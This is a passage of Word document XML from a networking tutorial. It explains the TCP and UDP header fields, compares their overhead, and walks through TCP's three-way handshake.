    <w:p w14:paraId="59A1CFAF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve"> 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA95314" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">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p>
    <w:p w14:paraId="0DE4EC54" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│          Source Port          │       Destination Port        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224AFFA0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">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p>
    <w:p w14:paraId="323D5DF0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│                        Sequence Number                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77499E98" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">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p>
    <w:p w14:paraId="5E562853" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│                     Acknowledgment Number                     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A55E2C7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">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p>
    <w:p w14:paraId="3BE9B1FA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│Offset│ Res │Flags│            Window Size                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5D9AD1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">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p>
    <w:p w14:paraId="1508F2FC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│           Checksum            │        Urgent Pointer         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135E63B9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">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p>
    <w:p w14:paraId="27247033" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│                    Options (0–40 bytes)                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF10CA6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">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p>
    <w:p w14:paraId="297F1805" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key fields:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC937E2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1365"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sequence Number (32 bits):</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Identifies the position of the first byte in this segment within the byte stream. Enables ordering and duplicate detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41719831" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1365"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Acknowledgment Number (32 bits):</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> The next byte the receiver expects. Acknowledges all bytes up to this number.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE86764" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1365"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flags (9 bits):</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> SYN, ACK, FIN, RST, PSH, URG, ECE, CWR, NS — control connection lifecycle and behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D34E22" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1365"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Window Size (16 bits):</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> How many bytes the receiver can accept (flow control). With Window Scaling option: up to 1 GB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206929EC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1365"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Options:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Timestamps, SACK (Selective Acknowledgment), Window Scaling, MSS (Maximum Segment Size).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7A05B8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 UDP Header (8 bytes — fixed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3A4C85" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50965AB7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve"> 0                   1                   2                   3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3322F480" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve"> 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0A9A0E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">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p>
    <w:p w14:paraId="34C4F6D5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│          Source Port          │       Destination Port        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033E2ADD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">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p>
    <w:p w14:paraId="02FF1FD4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│            Length             │           Checksum            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1074BCB2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">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p>
    <w:p w14:paraId="6977B75F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>That's it.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Four fields. No sequence numbers. No acknowledgments. No window. No flags. No options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C2B15D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UDP adds only:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381B1C18" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1366"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Port multiplexing (which application on this host gets the packet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0311A05C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1366"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Length (how big the datagram is).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5641A284" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1366"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Checksum (optional in IPv4, mandatory in IPv6 — detects corruption).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F048B88" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.3 Header Overhead Comparison</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4606"/>
        <w:gridCol w:w="3047"/>
        <w:gridCol w:w="1697"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="1C20E62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69A843" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Aspect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68F398" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TCP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560594" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>UDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="66E3C80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2ACC93" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Minimum header size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F6EBC8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>20 bytes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C04354" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>8 bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="22073F5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7D9E91" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Typical header size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38FB57" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>32 bytes (with timestamps)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0F0A33" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>8 bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="026700D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14B26A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Maximum header size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0D3186" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>60 bytes (all options)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31B12D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>8 bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="4BD4A25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97E463" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Per-message overhead for 100-byte payload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219139" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>32% overhead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CCE75D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>8% overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3764CF5A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>For small, frequent messages (game state updates, sensor readings, DNS queries), UDP's smaller header is a meaningful efficiency gain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3173912E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="37700E3F">
          <v:rect id="_x0000_i5014" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39955140" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. TCP — Deep Internal Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305ADF4A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 Connection Establishment (Three-Way Handshake)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2934E7F6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB3862E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Client                              Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2F8D4C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  │                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4C5662" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  │─── SYN (seq=x) ──────────────────&gt;│  1. Client initiates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9AA2CD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  │                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20646AF7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  │&lt;── SYN-ACK (seq=y, ack=x+1) ──────│  2. Server acknowledges + initiates back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47684D10" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  │                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076135A8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  │─── ACK (seq=x+1, ack=y+1) ───────&gt;│  3. Client acknowledges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37543584" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  │                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3495C75F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  │    Connection ESTABLISHED          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710E46C0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  │    (data can flow both ways)       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBD1947" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What happens internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307F976E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 1 — Client SYN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E11A40" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1367"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Client chooses a random initial sequence number (ISN): e.g., 1000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB8C112" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1367"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Sends SYN packet with seq=1000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D3B5BE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1367"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Client enters SYN_SENT state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F00A93" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1367"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Kernel allocates a socket, a TCB (Transmission Control Block) — ~280 bytes of state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D266FE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2 — Server SYN-ACK:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC603F4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1368"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Server receives SYN. Chooses its own ISN: e.g., 5000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39926DC6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1368"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Sends SYN-ACK: seq=5000, ack=1001 ("I received your byte 1000, next I expect 1001").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418A1F5E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1368"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Server enters SYN_RECEIVED state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE23C34" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1368"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Kernel allocates TCB for this connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042C75AE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3 — Client ACK:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AB3F25" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1369"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Client receives SYN-ACK. Sends ACK: seq=1001, ack=5001.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA24B5B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1369"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Client enters ESTABLISHED state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19319E87" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1369"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Server receives ACK → enters ESTABLISHED state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9B6AED" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1369"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Connection is ready for data in both directions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2861BD52" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cost:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> 1 full round-trip time (RTT) before ANY data can be sent. For a 100ms RTT link, that's 100ms of pure overhead before the application can send a single byte.</w:t>
      </w:r>
    </w:p>
